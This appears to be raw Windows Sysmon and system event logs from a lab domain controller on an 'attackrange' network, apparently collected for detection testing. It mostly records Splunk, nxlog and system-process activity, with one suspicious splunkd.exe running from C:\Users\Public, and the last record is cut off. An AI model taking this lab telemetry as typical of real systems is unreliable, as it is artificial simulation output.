{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2252,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.993\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nProcessId: 2916\r\nQueryName: WIN-DC-8400769\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\dfsrs.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.993","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001094C70200}","QueryName":"WIN-DC-8400769","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\dfsrs.exe","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76826,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The SplunkForwarder service entered the running state.","param1":"SplunkForwarder","param2":"running","EventReceivedTime":"2020-08-01 06:49:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7026,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76827,"ProcessID":852,"ThreadID":856,"Channel":"System","Message":"The following boot-start or system-start driver(s) did not load: \r\ncdrom\r\ndam","param1":"\r\ncdrom\r\ndam","EventReceivedTime":"2020-08-01 06:49:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2253,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.724\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.724","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2254,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.746\r\nProcessGuid: {E2A3D6B1-1071-5F25-0000-001071190400}\r\nProcessId: 3772\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nFileVersion: 8.0.2\r\nDescription: Remote Performance monitor using WMI\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-wmi.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.746","ProcessGuid":"{E2A3D6B1-1071-5F25-0000-001071190400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","FileVersion":"8.0.2","Description":"Remote Performance monitor using WMI","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-wmi.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2255,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2256,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.927\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1071-5F25-0000-001071190400}\r\nTargetProcessId: 3772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.927","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1071-5F25-0000-001071190400}","TargetProcessId":"3772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2257,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2258,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2259,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.927\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1071-5F25-0000-001071190400}\r\nTargetProcessId: 3772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.927","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1071-5F25-0000-001071190400}","TargetProcessId":"3772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2260,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 